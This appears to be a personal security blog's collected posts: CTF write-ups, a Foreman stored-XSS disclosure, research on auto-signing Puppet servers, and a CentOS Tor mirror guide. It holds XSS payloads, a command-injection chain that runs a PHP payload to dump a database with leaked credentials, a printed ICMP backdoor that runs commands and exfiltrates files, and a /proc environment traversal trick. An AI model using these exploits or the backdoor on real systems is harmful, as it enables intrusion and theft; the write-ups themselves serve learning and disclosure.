NeverLAN CTF 2018 JSON parsing 1

The NeverLAN CTF challenge JSON parsing 1:

The linked file can be found here.

The JSON file contains a minute of VirusTotal scan logs. The challenge wants us to find the 5 AV engines which had the highest detection ratio (not detection count) in that timeframe. To solve it I created this quick Python script:

from __future__ import division
import json

result_true = {}
result_false = {}
result_ratio = {}

with open('file-20171020T1500') as f:
    for line in f:
        data = json.loads(line)
        for scanner in data['scans']:
            if data['scans'][scanner]['detected'] == True:
                if scanner in result_true:
                    result_true[scanner] += 1
                else:
                    result_true[scanner] = 1
            else:
                if scanner in result_false:
                    result_false[scanner] += 1
                else:
                    result_false[scanner] = 1

for scanner in set(result_true) | set(result_false):
    detected = result_true.get(scanner, 0)
    missed = result_false.get(scanner, 0)
    result_ratio[scanner] = detected / (detected + missed) * 100

for key, value in sorted(result_ratio.iteritems(), key=lambda (k,v): (v,k)):
    print "%s: %s" % (key, value)

It counts detections for each AV engine and afterwards calculates the detection ratio for each one. Running it prints all ratios sorted from lowest to highest. The last 5, separated by commas, form the flag:

The flag is: SymantecMobileInsight,CrowdStrike,SentinelOne,Invincea,Endgame

hxp CTF 2017 irrgarten

The hxp CTF 2017 irrgarten challenge:

Running the dig command (with added +short to reduce output) provided the following output:

$ dig -t txt -p53535 @ +short
"try" "down.<domain>"

Playing around with it we figured out you can prepend “up”, “down”, “left” and “right” to the records to navigate a maze:

$ dig -t txt -p53535 @ +short
$ dig -t txt -p53535 @ +short
$ dig -t txt -p53535 @ +short

An empty reply probably means that there is a wall in the way; otherwise you get the DNS record of the next tile.

To solve it and figure out how big the maze is, this very inefficient Python script was created:

#!/usr/bin/env python
import subprocess

todo = [ '\n' ]
done = [ ]
directions = [ 'up', 'down', 'left', 'right' ]

while todo:
  tile = todo.pop(0)
  done.append(tile)
  check = subprocess.check_output("/usr/bin/dig +short -t ANY -p53535 @ " + tile, shell=True)
  print check
  for direction in directions:
    fqdn = direction + '.' + tile
    output = subprocess.check_output("/usr/bin/dig +short -t ANY -p53535 @ " + fqdn, shell=True)
    if output and fqdn not in done and fqdn not in todo:
      print output
      todo.append(fqdn)
This loops over all known tiles and checks whether there is an accessible tile next to it in all 4 directions. If there is, it is added to the todo list and the script moves on. All newly found tiles are written to stdout. The base FQDN without a direction prepended is also queried; this is where we suspected the flag would be found.

While this was running we were trying to implement a more efficient solution but it captured the flag after around 28’000 tiles:

"Flag:" "hxp{w3-h0p3-y0u-3nj0y3d-dd051n6-y0ur-dn5-1rr364r73n}"
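The more efficient approach we were aiming for boils down to a breadth-first search that queries each tile at most once. A sketch with a stand-in query function (the real lookup would shell out to dig as above; the maze dict here is just a mock):

```python
from collections import deque

def solve(start, query):
    # query(fqdn) stands in for the dig TXT lookup; it returns the
    # record text, or None when a wall blocks the way.
    seen = {start}
    todo = deque([start])
    while todo:
        tile = todo.popleft()
        record = query(tile)
        if record and "Flag" in record:
            return record
        for direction in ("up", "down", "left", "right"):
            fqdn = direction + "." + tile
            if fqdn not in seen and query(fqdn):
                seen.add(fqdn)
                todo.append(fqdn)

# tiny mock maze to illustrate the traversal
maze = {"start": "try", "up.start": "go on", "left.up.start": "Flag: hxp{...}"}
print(solve("start", maze.get))  # Flag: hxp{...}
```

Each tile enters the queue exactly once, so no FQDN is ever queried twice from the todo side.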


Stored XSS in Foreman

Following up a bit on my recent post “Looking at public Puppet servers” I was wondering how an attacker could extend their privileges within the Puppet ecosystem, especially when a system like Foreman is used. Cross-site scripting could be useful for this: gaining access to Foreman would basically allow an attacker to compromise everything.

I first focused on facts. Facts are generated by the local system and can be overwritten given enough permissions. Displaying facts in the table seemed to be secured sufficiently, however there is another function on the /fact_values page: showing a distribution graph of a specific fact.

When the graph is displayed HTML tags are not removed from facts and XSS is possible. Both in the fact name (as a header in the chart) and fact value (in the legend of the chart).

For example, add two new facts by running:

mkdir -p /etc/facter/facts.d/
cat << EOF >> /etc/facter/facts.d/xss.yaml
aaa_test_fact<script>alert(1)</script>: xxx
aab_test_fact: x<script>alert(1)</script>xx
EOF

It will show up like this on the global /fact_values page:

Clicking on the “Show distribution chart” action on either of those facts will execute the provided alert(1) JavaScript:

That’s fun but not really useful; tricking someone into clicking on the distribution chart of such a weird fact seems impractical.

But since the XSS is in the value of the fact we can just overwrite more interesting facts on that node and hope that an Administrator wants to see the distribution of that fact. For example, let’s add this to xss.yaml:

kernelversion: x><script>alert(1)</script>xx

Now if an Administrator wants to know the distribution of kernel versions in their environment and uses this chart feature on any host, the alert(1) JavaScript will get executed. This is what any other node will look like:

And after navigating to the kernelversion distribution chart on that page:

Still some interaction needed. I’ve noticed that the general /statistics page uses the same graphs, and facts like “manufacturer” appear in them. Unlike the other graphs these do not have a legend, but when you hover over a portion of the graph you get a tooltip with the fact value. This is again vulnerable to XSS. For example, add this to xss.yaml:

manufacturer: x<img src='/' onerror='alert(1)'>x

Now when you visit the /statistics page and move the mouse over the hardware graph, the alert(1) will execute:

Still needs interaction. But if you inject a value into all the graphs it may not take long for an Administrator to hover over one of those.

However: by default Foreman uses CSP. Stealing someone’s session with this setup is not easily possible, so my initial plan to steal an Administrator’s Foreman session failed in the end.

This was tested on Foreman 1.15.6 and reported to the Foreman security team on 2017-10-31.
CVE-2017-15100 has been assigned to this issue.
A fix is already implemented and will be released with version 1.16.0.


HITCON 2017 CTF Data & Mining

The HITCON 2017 CTF “Data & Mining” challenge:

The file attached was a 230MB big pcapng file.

I think I solved this by accident. I was sifting through the data for a bit and started to exclude the flows with huge amounts of data, as they were mostly compressed / unreadable to me.

In the remaining data I stumbled over a plaintext TCP stream on port 3333:

This contained the flag in plaintext: hitcon{BTC_is_so_expensive_$$$$$$$}

In retrospect, searching for the string hitcon in the packet data would have worked as well.

HITCON 2017 CTF Baby Ruby Escaping

The HITCON 2017 CTF “Baby Ruby Escaping” challenge had the following description:

And the attached Ruby file was:

#!/usr/bin/env ruby

require 'readline'

proc {
  my_exit = Kernel.method(:exit!)
  my_puts = $stdout.method(:puts)
  ObjectSpace.each_object(Module) { |m| m.freeze if m != Readline }
  set_trace_func proc { |event, file, line, id, binding, klass|
    bad_id = /`|exec|foreach|fork|load|method_added|open|read(?!line$)|require|set_trace_func|spawn|syscall|system/
    bad_class = /(?<!True|False|Nil)Class|Module|Dir|File|ObjectSpace|Process|Thread/
    if event =~ /class/ || (event =~ /call/ && (id =~ bad_id || klass.to_s =~ bad_class))
      my_puts.call "\e[1;31m== Hacker Detected (#{$&}) ==\e[0m"
      my_exit.call
    end
  }
}.call

loop do
  line = Readline.readline('baby> ', true)
  puts '=> ' + eval(line, TOPLEVEL_BINDING).inspect
end
Connecting to the challenge server on port 50216 we got the baby> prompt and any entered Ruby code was executed, except of course when it was blacklisted.

We were stuck with this for a while, nothing useful would execute. Until we noticed that all other challenges had only a “nc $ip $port” as the description and this one said: socat FILE:$(tty),raw,echo=0 TCP:

Of course: Readline was used in this script, with filename completion enabled. Connecting with the above socat command and pressing TAB twice gave us:


Now we at least knew the filename to read was thanks_readline_for_completing_the_name_of_flag.

Again we were stuck for a while. We couldn’t load any new modules, we tried opening files in all the ways we could find, went through the Kernel module methods and finally found a way in the documentation example of gets which worked:

baby> ARGV << 'thanks_readline_for_completing_the_name_of_flag'
=> ["thanks_readline_for_completing_the_name_of_flag"]
baby> print while gets
hitcon{Bl4ckb0x.br0k3n? ? puts(flag) : try_ag4in!}
=> nil

That’s it, the flag was: hitcon{Bl4ckb0x.br0k3n? ? puts(flag) : try_ag4in!}

HITCON 2017 CTF BabyFirst Revenge

The HITCON 2017 CTF “BabyFirst Revenge” challenge:

On the specified webserver this PHP script was running:

<?php
    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
Basically, it executes whatever is passed in the cmd parameter, as long as it is no longer than 5 bytes. The output of the command is not displayed.

After some time we figured out that the sandbox folder is also reachable via HTTP, so we could at least run things like ls>x and fetch the result.
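Sending the 5-byte commands can be wrapped in a small helper. The base URL below is a placeholder, not the actual challenge host:

```python
from urllib.parse import urlencode

def cmd_url(base, cmd):
    # the PHP script only executes commands of at most 5 bytes
    if len(cmd.encode()) > 5:
        raise ValueError("command longer than 5 bytes: %r" % cmd)
    return base + "?" + urlencode({"cmd": cmd})

# placeholder URL for illustration
print(cmd_url("http://target/sandbox.php", "ls>x"))  # http://target/sandbox.php?cmd=ls%3Ex
```

urlencode takes care of escaping characters like > so the redirection survives the trip through the query string.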

Our next idea was to use shell wildcards to run longer commands. First we wanted a list of all files on the system. We created an empty file named find and then used wildcards to run it:

curl '>find'
curl '*%20/>x'

The second curl executes * />x, which effectively expands to find />x. We fetched the file x from the server and saw that the file exists and is readable by our current user:
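The expansion trick is easy to reproduce locally: in a directory containing a file named find, the shell expands a bare * into the sorted file names, so the first name becomes the command. A quick sketch using a temporary directory:

```python
import os
import subprocess
import tempfile

d = tempfile.mkdtemp()
# create an empty file whose *name* is the command we want to run
open(os.path.join(d, "find"), "w").close()

# `echo *` shows what a bare * expands to inside that directory
out = subprocess.check_output("cd %s && echo *" % d, shell=True)
print(out)  # b'find\n'
```

With more files present the expansion is sorted alphabetically, which is why the helper files in the write-up are named so the intended word order comes out (tar before zcf before zzz).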


We need to get that file. We’ve used tar to get it by requesting:

curl '>tar'
curl '>zcf'
curl '>zzz'
curl '*%20/h*'

This creates the files tar, zcf and zzz. Then we run * /h*, which expands to:

tar zcf zzz /h*

Downloading the file “zzz” we find in the README.txt:

Flag is in the MySQL database
fl4444g / SugZXUtgeJ52_Bvr

Running mysqldump with that username and password is impossible with only wildcards. Instead we figured out that if we POST content to that URL, it is stored in a file in /tmp for the duration of that request. With that we can upload arbitrary commands but not yet execute them: any form of sh /tmp/* is too long for the 5 byte limit.

Tar to the rescue again:

cat << EOF >> exploit.php
<?php exec('mysqldump --single-transaction -ufl4444g -pSugZXUtgeJ52_Bvr --all-databases > /var/www/html/sandbox/727479ef7cedf30c03459bec7d87b0f0/dump.sql 2>&1'); ?>
EOF
curl ''
curl '>tar'
curl '>vcf'
curl '>z'
curl -F file=@exploit.php -X POST ''
curl ''

What it does is prepare a local file “exploit.php” which contains PHP code to run mysqldump and write the output to our sandbox folder. The --single-transaction parameter is important, without it the mysqldump will not complete due to missing permissions.

We then create the files tar, vcf and z on the server.
Then run * /t* which expands to:

tar vcf z /t*

This creates an uncompressed file “z” with all the contents of /tmp, including the exploit we POST’ed with that same request. After that, php z executes this tar file: PHP happily skips over all the binary parts and runs the PHP payload.

With that the “dump.sql” file is created, downloaded and it finally contained:

LOCK TABLES `this_is_the_fl4g` WRITE;
/*!40000 ALTER TABLE `this_is_the_fl4g` DISABLE KEYS */;
INSERT INTO `this_is_the_fl4g` VALUES ('hitcon{idea_from_phith0n,thank_you:)}');
/*!40000 ALTER TABLE `this_is_the_fl4g` ENABLE KEYS */;

The flag is: hitcon{idea_from_phith0n,thank_you:)}

SHA2017 CTF Network 300 (“Abuse Mail”) challenge

A quick write-up of the SHA2017 CTF Network 300 (“Abuse Mail”) challenge. I’ve participated with our newly formed team “Hackbuts”.

To solve this challenge you only get a 590KB abusemail.tgz file and this short description:

“Our abuse desk received an mail that someone from our network has hacked their company. With their help we found some suspected traffic in our network logs, but we can’t find what exactly has happened. Can you help us to catch the culprit?”

Unpacked we find 3 pcap files: abuse01.pcap, abuse02.pcap and abuse03.pcap.

After loading abuse01.pcap into Wireshark we immediately notice a telnet session. Following the TCP stream we see someone logging into a VPN router and running “ip xfrm state”:

The remaining packets are encrypted VPN traffic. Using the information of the telnet session we can setup decryption like this in Wireshark:

In the now decrypted remaining packets we see a port scan and after that an HTTP session. The attacker exploited a command injection vulnerability in a ping web service by sending requests like this to it: GET /?;ls

Further down in the HTTP stream he uploads a malicious Python script (“GET /?ip=%3Bwget%20http://”) and kindly enough echoes it back (“GET /?ip=%3Bcat%20/tmp/”). Through this we obtained the script:
#!/usr/bin/env python

import base64
import sys
import time
import subprocess
import threading

from Crypto import Random
from Crypto.Cipher import AES
from scapy.all import *

BS = 16
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
unpad = lambda s : s[0:-ord(s[-1])]
magic = "SHA2017"

class AESCipher:

    def __init__( self, key ):
        self.key = key

    def encrypt( self, raw ):
        raw = pad(raw)
        iv = AES.block_size )
        cipher = self.key, AES.MODE_CBC, iv )
        return base64.b64encode( iv + cipher.encrypt( raw ) )

    def decrypt( self, enc ):
        enc = base64.b64decode(enc)
        iv = enc[:16]
        cipher = self.key, AES.MODE_CBC, iv )
        return unpad(cipher.decrypt( enc[16:] ))

def run_command(cmd):
    ps = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
    output = ps.communicate()[0]
    return output

def send_ping(host, magic, data):
    data = cipher.encrypt(data)
    load = "{}:{}".format(magic, data)
    sr(IP(dst=host)/ICMP()/load, timeout=1, verbose=0)

def chunks(L, n):
    for i in xrange(0, len(L), n):
        yield L[i:i+n]

def get_file(host, magic, fn):
    data = base64.urlsafe_b64encode(open(fn, "rb").read())
    cnt = 0
    icmp_threads = []
    for line in chunks(data, 500):
        t = threading.Thread(target = send_ping, args = (host, magic, "getfile:{}:{}".format(cnt, line)))
        t.daemon = True
        t.start()
        icmp_threads.append(t)
        cnt += 1

    for t in icmp_threads:
        t.join()
cipher = AESCipher(sys.argv[1])

while True:
        pkts = sniff(filter="icmp", timeout=5, count=1)

        for packet in pkts:
            if str(packet.getlayer(ICMP).type) == "8":
                input = packet[IP].load
                if input[0:len(magic)] == magic:
                    input = input.split(":")
                    data = cipher.decrypt(input[1]).split(":")
                    ip = packet[IP].src
                    if data[0] == "command":
                        output = run_command(data[1])
                        send_ping(ip, magic, "command:{}".format(output))
                    if data[0] == "getfile":
                        #print "[+] Sending file {}".format(data[1])
                        get_file(ip, magic, data[1])

And after that he executed the backdoor script:

GET /?ip=%3Bnohup%20sudo%20python%20/tmp/\& HTTP/1.1

Looking at the other two captures next, we find only ICMP traffic in both of them. The data part of those packets is rather large, always starts with “SHA2017:” and the following data looks like a base64 encoded string:

Reviewing the Python script, this makes sense: the backdoor runs commands, encrypts their output, base64 encodes it and sends it via ICMP to a remote host. It can also transfer complete files.

In Wireshark we apply the data section as a column and export it as json for both abuse02.pcap and abuse03.pcap. And then extract only the data portion to new files:

fgrep abuse3.json |uniq |sed 's/^.*"": "//g' | sed 's/",.*//g' | sed 's/://g' > abuse3_data.txt
fgrep abuse2.json |uniq |sed 's/^.*"": "//g' | sed 's/",.*//g' | sed 's/://g' > abuse2_data.txt

Next convert this data into ASCII and remove the “SHA2017:” prefix:

while read line ; do echo "$line" | xxd -r -p |sed 's/^SHA2017://g' ; done < abuse2_data.txt > abuse2_ascii.txt
while read line ; do echo "$line" | xxd -r -p |sed 's/^SHA2017://g' ; done < abuse3_data.txt > abuse3_ascii.txt

Those files now contain base64 encoded data which is AES encrypted. We’ve created this simple decryption script based on the decrypt function of the script. The key was leaked in the first HTTP session when the script was initially started:

import base64
import sys
import time
from Crypto import Random
from Crypto.Cipher import AES

enc = sys.argv[1]
unpad = lambda s : s[0:-ord(s[-1])]
enc = base64.b64decode(enc)
iv = enc[:16]

cipher ='K8djhaIU8H2d1jNb', AES.MODE_CBC, iv )
print unpad(cipher.decrypt( enc[16:] ))

With this script we can decrypt both files now:

while read line ; do python "$line" ; done < abuse2_ascii.txt > abuse2_decrypted.txt
while read line ; do python "$line" ; done < abuse3_ascii.txt > abuse3_decrypted.txt

The abuse2_decrypted.txt now contains the results of Linux commands the attacker ran on the compromised “intranet” webserver. He started some nmap scans and listed a few files, but he also cat’ed the TLS keys of the webserver and ran two more tcpdump sessions:

The data in abuse3_decrypted.txt appears to come from the file sending functionality of the backdoor script. The two pcap files “intranet.pcap” and “usb.pcap” are in this file. We manually split the data so that the content for each file has its own file (“intranet_encoded.txt” and “usb_encoded.txt”). The “headers” were removed as well:


The files now have this format:


Reverse engineering the backdoor script, we figured out that the number after getfile is the sequence in which the packet was sent, but the packets were not received in this order. We also see that the complete file is read, base64 encoded (urlsafe) and then chunks of this data are exfiltrated via ICMP. This means that we need to order the lines and arrange them into one single line:

sed 's/getfile://g' intranet_encoded.txt |sort -n| sed 's/^.*://g' | tr -d "\n\r" > intranet_one_line.txt
sed 's/getfile://g' usb_encoded.txt |sort -n| sed 's/^.*://g' | tr -d "\n\r" > usb_one_line.txt

We created this simple script to decode the files:

import base64
import sys

file = sys.argv[1]
print base64.urlsafe_b64decode(open(file, "rb").read())

And decoded them:

python intranet_one_line.txt > intranet.pcap
python usb_one_line.txt > usb.pcap

Checking intranet.pcap we find an HTTPS session. We set up SSL decryption in Wireshark like this:

The key for this was obtained in abuse02 decrypted data. In the now decrypted session we can see that the attacker downloads “” from the intranet server. With Wireshark we can extract that object from the stream:

But we cannot open it, it is encrypted with a password.

Next we look at the usb.pcap file. After a bit of research it was clear that the dump is from a USB keyboard. In Wireshark we apply the “leftover capture data” as a column and set a display filter to:

((frame.len == 72)) && !(usb.capdata == 00:00:00:00:00:00:00:00) && !(usb.capdata == 02:00:00:00:00:00:00:00)

With this and a HID usage table (, page 53) we can lookup the keystrokes:

If the data begins with “02” it means that the shift key is pressed as well; if not, the character is lowercase. Going through the pcap we can see the attacker logging into the system, downloading via curl and finally using unzip to extract it, with the password: “Pyj4m4P4rtY@2017”
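The lookup can also be scripted. A minimal sketch, assuming 8-byte boot-protocol keyboard reports and covering only letters and digits (byte 0 is the modifier, byte 2 the keycode):

```python
# HID usage IDs: 0x04-0x1d map to a-z, 0x1e-0x27 to the digits 1-9 and 0
KEYS = {0x04 + i: chr(ord("a") + i) for i in range(26)}
KEYS.update({0x1e + i: "1234567890"[i] for i in range(10)})

def decode(report):
    modifier, keycode = report[0], report[2]
    if keycode == 0:  # no key pressed in this report
        return ""
    char = KEYS.get(keycode, "?")
    # modifier 0x02 = left shift held down
    return char.upper() if modifier == 0x02 else char

reports = [b"\x00\x00\x16\x00\x00\x00\x00\x00",  # usage 0x16 -> s
           b"\x02\x00\x04\x00\x00\x00\x00\x00"]  # shift + usage 0x04 -> A
print("".join(decode(r) for r in reports))  # sA
```

A real decoder would also handle punctuation and the shifted symbol row, which is where characters like “@” in the password come from.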

We use the same password to also decrypt the file and we get a secret.txt file, which finally contains the flag:

Looking at public Puppet servers

This is about research I did a while ago but only now found the time to write about.

At the beginning of this year I was curious to see how many Puppet 3 servers – freshly end of life back then – were connected directly to the internet:

If you don’t know Puppet: It’s a configuration management system that contains information to deploy systems and services in your infrastructure. You write code which defines how a system should be configured e.g. which software to install, which users to deploy, how a service is configured, etc.
It typically uses a client-server model, the clients periodically pull the configuration (“catalog”) from their configured server and apply it locally. Everything is transferred over TLS encrypted connections.

Puppet uses TLS client certificates to authenticate nodes. When a client (“puppet agent”) connects for the first time to a server it will generate a key locally and submit a certificate signing request to the server.
An operator needs to sign the certificate and from that point on the agent can pull its configuration from the server.

However it’s possible to configure the Puppet server to simply sign all incoming CSRs automatically.
This is obviously not recommended unless you want anyone to be able to obtain possibly sensitive information about your infrastructure. The Puppet documentation mentions several times that this is insecure:
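For reference, naive auto-signing is typically just a single setting on the server; a sketch of the relevant puppet.conf section (the exact file location depends on the installation):

```ini
# puppet.conf on the Puppet server
[master]
# sign every incoming CSR without any checks - insecure
autosign = true
```

The same effect can be achieved with an autosign.conf whitelist containing a catch-all entry, which is equally dangerous on an internet-facing server.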

First I was interested if anyone is already looking for servers configured like this.
I’ve setup a honeypot Puppet server with auto-signing enabled and waited.
But after months there still was not a single CSR submitted, only port scanners tried to connect to it.

I’ve decided to look for those servers myself.
With a small script I looped over around 2500 servers that were still online – there were more, but due to time constraints I only checked 2500. I built a system which connects to all of those servers and submits a CSR. The “certname” – this is what operators see when reviewing CSRs – was always the same, and it was pretty obvious that it was not a legitimate request.
An attacker would do more recon, get the FQDNs of the Puppet server from its certificate and try to guess a more likely name.

Out of those 2500 servers:
89 immediately signed our certificate.

Out of those 89:
50 compiled a valid catalog that could have been applied directly.
39 tried to compile a catalog and failed with issues that could potentially be worked around on the client but no time was spent on that.

It is a normal setup to have a default role: if an unknown node connects it may get only this configuration applied. Usually this deploys the administrator user accounts and sets generic settings. This happened a lot, and it is already problematic since the system accounts also get their password hash configured, which could now be brute-forced. A lot of servers also conveniently sent along their sudoers configuration, so an attacker could target higher privileged accounts directly.
But some of those servers automatically assigned more generic roles: exposing root SSH keys, AWS credentials and configuration files of their services (Nginx, PostgreSQL, MySQL, …), trying to copy source code to my client, and leaking passwords / password hashes of database and other service users:

And more. There are systems that could be immediately compromised with the information that they leak. The others at least tell attackers a lot about the system which makes further attacks much easier.

Here is where it gets interesting: one day later I connected to the same 2500 servers again, using the keys from the day before, and tried to retrieve a catalog. Normally we’d expect the number to now be stable or slightly lower. But in this case it’s not:

145 servers allowed us to connect.
58 gave us a valid catalog that could be applied.

And one week later:
159 servers allowed us to connect.
63 gave us a valid catalog that could be applied.

Those servers were not offline during the first round either. They simply signed my CSR in the meantime without noticing that it was not one of their own requests, or – as I suspect – it is a combination of the following two items:

1) Generally when you are working with Puppet certificates you’ll be using “puppet cert $sub-command” to handle the TLS operations for you.

The problem is that there is no way to tell it to simply reject a signing request.
You can “revoke” or “clean” certificates, but they have to be signed first (see:
There may have been an option using the “puppet ca” command, but it has been deprecated and pretty much every documentation only mentions “puppet cert” nowadays.

You are left with these options:

  • Manually figure out where the .csr file is stored on the server and remove it
  • Use the deprecated tool “puppet ca destroy $certname”
  • Run “puppet cert sign $certname && puppet cert clean $certname”
  • Run “puppet cert sign $certname && puppet cert revoke $certname”

Some are unfortunately using the last two options.

There is the possibility that on some of those systems my certificate request was signed if only for a few seconds. Which brings us to the next issue:

2) Puppet server or in some cases the reverse proxy in front of it will only read the certificate revocation list at startup time.
If you don’t restart these services after revoking a certificate, it will still be allowed to connect.

“puppet cert revoke $certname” basically only adds the certificate to the CRL. It does not remove the signed certificate from the server.
I suspect that some operators have signed and revoked my certificate but haven’t restarted the service afterwards.

On the other hand “puppet cert clean $certname” will additionally remove the signed certificate from the server, when my client connects later it cannot get the signed certificate and is locked out.
This isn’t perfect either. If the client constantly requests the certificate it could retrieve it before the “clean” ran, but it is far better than only using “revoke”.

Depending on how you use Puppet, it may be one of your most critical systems containing the keys to your kingdom. There are very few cases where it makes sense to expose a Puppet server directly to the internet.
Those systems should be the best protected systems in your infrastructure, a compromised Puppet server essentially compromises all clients that are connecting to it.

Basic or naïve auto-signing should not be used in a production environment unless you can ensure that only trusted clients can reach the Puppet server. Otherwise, only policy-based auto-signing or manual signing is secure.

Google CTF 2017 mindreader

This is a write-up for the Google CTF 2017 “mindreader” challenge.

The mindreader webserver presented us with only a single input form:

Pretty much by the second term we entered it was clear that any filename specified in the form would be read from the local disk. This sounded like an easy challenge.
Better yet, since /etc/shadow was also displayed, the process was probably running with root privileges. Jackpot!

The logical next step was to try to fetch the usual files you’d expect to contain anything useful: Service configuration files, shell histories, any log file or pretty much anything we could think of – but nothing useful was returned.

Some files that we expected to exist like /etc/ssh/sshd_config threw a 404 and others (/proc/cpuinfo) a 403.

The HTTPS server responded with an nginx server header but there was no sign of nginx anywhere on the filesystem either. Nor of any other webserver.

With /etc/issue and /etc/debian_version the system was identified as Debian 8.8.
Digging into the Debian specific files we grabbed /var/log/apt/history.log:

That file showed that these packages were all installed in a single transaction:

git mercurial pkg-config wget python-pip python2.7 python2.7-dev 
python3.4 python3.4-dev build-essential libcurl4-openssl-dev libffi-dev 
libjpeg-dev libmysqlclient-dev libpng12-dev libpq-dev libssl-dev 
libxml2-dev libxslt1-dev swig zlib1g-dev gfortran libatlas-dev 
libblas-dev libfreetype6-dev liblapack-dev libquadmath0 
libmemcached-dev libsasl2-2 libsasl2-dev libsasl2-modules sasl2-bin

Searching for that specific package list leads us to the Google Cloud Platform – Python Runtime Docker Image:

This explains the absence of pretty much any other service or configuration: We are attacking a Docker container.

The Dockerfile in that repository configures a work directory of /app. With that knowledge we can get the Python source code by requesting /app/

The source code revealed two key pieces of information:

  • There is an environment variable called “FLAG” (line 6).
  • Requests containing “proc” will always return a 403 (line 24).

Environment variables are of course exposed in /proc.

The filter looked solid and Python’s open() does not accept wildcards. We could not request anything containing “proc”.

But if there is a symlink pointing to a folder inside of /proc we wouldn’t need to request a file with “proc” in its name, we could traverse from there.

Quick research in a Vagrant VM showed that /dev/fd is a symlink to /proc/self/fd.
We requested /dev/fd/../environ:

And with that we finally got the flag.
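The symlink trick is easy to verify on any Linux system; this sketch reads the current process’s own environment:

```python
import os

# /dev/fd is a symlink into /proc, so the literal string "proc"
# never appears in the requested path
print(os.readlink("/dev/fd"))  # /proc/self/fd on Linux

# traversing up from the symlink target lands in /proc/self
environ = open("/dev/fd/../environ", "rb").read()
# environment variables are NUL-separated KEY=VALUE pairs
print(b"=" in environ)  # True
```

Since the path check in the challenge only matched the request string, the resolved /proc/self/environ was served without complaint.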


CentOS Tor mirror

I’m running a CentOS Tor mirror as a hidden service.
It is available under:


If you want to use this mirror you must first install Tor.
Follow these instructions to do that:

Once that is complete and the Tor service is running, install torsocks (from the EPEL repositories):

[root@localhost ~]# yum install epel-release

[root@localhost ~]# yum install torsocks


Afterwards change the YUM repository configuration file (/etc/yum.repos.d/CentOS-Base.repo) to include the hidden service URL.
Create a backup of the file in case you want to use the normal mirrors again.
The adjusted file should look like this (on CentOS 7):

[base]
name=CentOS-$releasever - Base
baseurl=http://<onion-address>/centos/$releasever/os/$basearch/

[updates]
name=CentOS-$releasever - Updates
baseurl=http://<onion-address>/centos/$releasever/updates/$basearch/

[extras]
name=CentOS-$releasever - Extras
baseurl=http://<onion-address>/centos/$releasever/extras/$basearch/

[centosplus]
name=CentOS-$releasever - Plus
baseurl=http://<onion-address>/centos/$releasever/centosplus/$basearch/
If you were manually editing the configuration file, please note that it now uses the baseurl option instead of the mirrorlist option as before.

With this in place you can now use the hidden mirror and install packages like this:

[root@localhost ~]# export TORSOCKS_LOG_LEVEL=1 # only required to stop getting spammed with warning messages
[root@localhost ~]# torsocks yum -y install bind-utils
Loaded plugins: fastestmirror
base                                                                                                                                      | 3.6 kB  00:00:00     
epel/x86_64/metalink                                                                                                                      |  26 kB  00:00:00     
epel                                                                                                                                      | 4.3 kB  00:00:00     
extras                                                                                                                                    | 3.4 kB  00:00:00     
tor/x86_64/signature                                                                                                                      |  490 B  00:00:00     
tor/x86_64/signature                                                                                                                      | 2.9 kB  00:00:00 !!! 
tor-source/signature                                                                                                                      |  490 B  00:00:00     
tor-source/signature                                                                                                                      | 2.9 kB  00:00:00 !!! 
updates                                                                                                                                   | 3.4 kB  00:00:00     
(1/9): base/7/x86_64/group_gz                                                                                                             | 155 kB  00:00:00     
(2/9): epel/x86_64/group_gz                                                                                                               | 169 kB  00:00:00     
(3/9): epel/x86_64/updateinfo                                                                                                             | 449 kB  00:00:00     
(4/9): extras/7/x86_64/primary_db                                                                                                         |  90 kB  00:00:00     
(5/9): tor-source/primary_db                                                                                                              | 2.4 kB  00:00:01     
(6/9): tor/x86_64/primary_db                                                                                                              | 4.0 kB  00:00:01     
(7/9): updates/7/x86_64/primary_db                                                                                                        | 953 kB  00:00:01     
(8/9): epel/x86_64/primary_db                                                                                                             | 3.7 MB  00:00:02     
(9/9): base/7/x86_64/primary_db                                                                                                           | 5.3 MB  00:00:05     
Determining fastest mirrors
 * epel:
Resolving Dependencies
--> Running transaction check
---> Package bind-utils.x86_64 32:9.9.4-29.el7_2.1 will be installed
--> Finished Dependency Resolution

Dependencies Resolved

 Package                               Arch                              Version                                        Repository                          Size
 bind-utils                            x86_64                            32:9.9.4-29.el7_2.1                            updates                            200 k

Transaction Summary
Install  1 Package

Total download size: 200 k
Installed size: 434 k
Downloading packages:
bind-utils-9.9.4-29.el7_2.1.x86_64.rpm                                                                                                    | 200 kB  00:00:00     
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
  Installing : 32:bind-utils-9.9.4-29.el7_2.1.x86_64                                                                                                         1/1 
  Verifying  : 32:bind-utils-9.9.4-29.el7_2.1.x86_64                                                                                                         1/1 

Installed:
  bind-utils.x86_64 32:9.9.4-29.el7_2.1

Complete!


Contact me if you need any help or if you have any suggestions.